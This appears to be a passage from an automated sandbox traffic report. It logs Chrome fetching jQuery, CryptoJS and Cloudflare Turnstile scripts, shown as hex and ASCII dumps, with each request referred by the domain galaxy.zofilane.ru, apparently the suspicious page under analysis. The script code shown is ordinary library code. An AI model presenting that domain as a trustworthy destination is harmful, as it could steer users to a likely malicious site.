                                                            2024-12-14 09:10:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                            2024-12-14 09:10:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                            2024-12-14 09:10:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.449769104.17.25.144436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:41 UTC652OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                            Host: cdnjs.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:42 UTC964INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:42 GMT
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            Cache-Control: public, max-age=30672000
                                                            ETag: W/"61182885-40eb"
                                                            Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                            cf-cdnjs-via: cfworker/kv
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Timing-Allow-Origin: *
                                                            X-Content-Type-Options: nosniff
                                                            CF-Cache-Status: HIT
                                                            Age: 226689
                                                            Expires: Thu, 04 Dec 2025 09:10:42 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yrsZ7i2hvkrQWuveYXMz%2FNDQIK5eZYqBNqInk%2ByTvNl1maJy9qBEw%2BS7LhEjMVdRlG5%2FcmxwIIhcOhGt7Zia3XSoddK5IMBaFKNzviCzlEKbLitmMhNbVQ6G%2BIOEnXvLpQcAk%2F39"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                            Strict-Transport-Security: max-age=15780000
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0ff0ac7f0f59-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:42 UTC405INData Raw: 37 62 65 64 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                            Data Ascii: 7bed!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63
                                                            Data Ascii: typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Objec
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                            Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                            Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                            Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                            Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                            Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                            Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                            Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                            2024-12-14 09:10:42 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                            Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.449768104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:41 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:42 UTC386INHTTP/1.1 302 Found
                                                            Date: Sat, 14 Dec 2024 09:10:42 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                            cross-origin-resource-policy: cross-origin
                                                            location: /turnstile/v0/g/f9063374b04d/api.js
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0ff0ddf243ef-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.449770104.18.95.414436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:43 UTC649OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:43 UTC471INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:43 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47692
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0ffb5f60176c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-12-14 09:10:43 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2024-12-14 09:10:43 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
